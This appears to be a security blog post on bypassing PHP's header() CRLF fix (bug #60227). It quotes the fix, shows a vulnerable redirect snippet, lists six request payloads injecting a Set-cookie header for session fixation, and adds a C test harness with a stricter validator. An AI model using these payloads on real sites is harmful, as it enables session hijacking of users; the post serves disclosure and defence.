Recently we wrote about a universal bypass for the PHP header() function.
That trick uses a %0d byte instead of %0d%0a to split the HTTP response.
The bug was fixed, as you can see in the changelog:
http://php.net/ChangeLog-5.php
Version 5.3.11
Fixed bug #60227 (header() cannot detect the multi-line header with CR).
The original bug is https://bugs.php.net/bug.php?id=60227
And what about the fix?
for (i = 0; i < header_line_len; i++) {
    /* RFC 2616 allows new lines if followed by SP or HT */
    int illegal_break =
        (header_line[i+1] != ' ' && header_line[i+1] != '\t') && (
            header_line[i] == '\n'
            || (header_line[i] == '\r' && header_line[i+1] != '\n'));
Pay attention to the red line.
And as we wrote before, the bug is still present for Internet Explorer.
Source code:
<?php
header("Location: /?asd".$_GET['r']);
?>
Attack vectors:
GET /?r=split%0d+Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%20Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%09Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a+Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a%20Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a%09Set-cookie:PHPSESSID=predicated HTTP/1.1
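As an added example (not code from the original post or from PHP itself), the check quoted above is copied into a standalone C function and run against the URL-decoded forms of the listed requests, next to a stricter check that rejects every CR and LF. The function names, the stricter check and the sample strings are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The quoted check as a standalone function (hypothetical name).
 * Returns 1 if the header line is accepted, 0 if rejected.
 * line must be NUL-terminated so that line[i + 1] is always readable. */
int fixed_check_accepts(const char *line, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        /* RFC 2616 allows new lines if followed by SP or HT */
        int illegal_break =
            (line[i + 1] != ' ' && line[i + 1] != '\t') && (
                line[i] == '\n'
                || (line[i] == '\r' && line[i + 1] != '\n'));
        if (illegal_break)
            return 0;
    }
    return 1;
}

/* Hypothetical stricter check for application code: no CR or LF at all. */
int strict_check_accepts(const char *line, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (line[i] == '\r' || line[i] == '\n')
            return 0;
    return 1;
}

/* Constructed samples: header lines built from the decoded requests above,
 * plus two controls. */
static const char *samples[] = {
    "Location: /?asdsplit\r Set-cookie:PHPSESSID=predicated",
    "Location: /?asdsplit\r\tSet-cookie:PHPSESSID=predicated",
    "Location: /?asdsplit\r\n Set-cookie:PHPSESSID=predicated",
    "Location: /?asdsplit\r\n\tSet-cookie:PHPSESSID=predicated",
    "Location: /?asdsplit\rSet-cookie:PHPSESSID=predicated", /* control: bare CR */
    "Location: /?asdsplit",                                  /* control: clean */
};

int main(void)
{
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        size_t len = strlen(samples[i]);
        printf("sample %zu: fixed=%d strict=%d\n", i,
               fixed_check_accepts(samples[i], len),
               strict_check_accepts(samples[i], len));
    }
    return 0;
}
```

Validating the redirect target in application code with the stricter rule before calling header() removes the dependence on how a given browser treats a folded line.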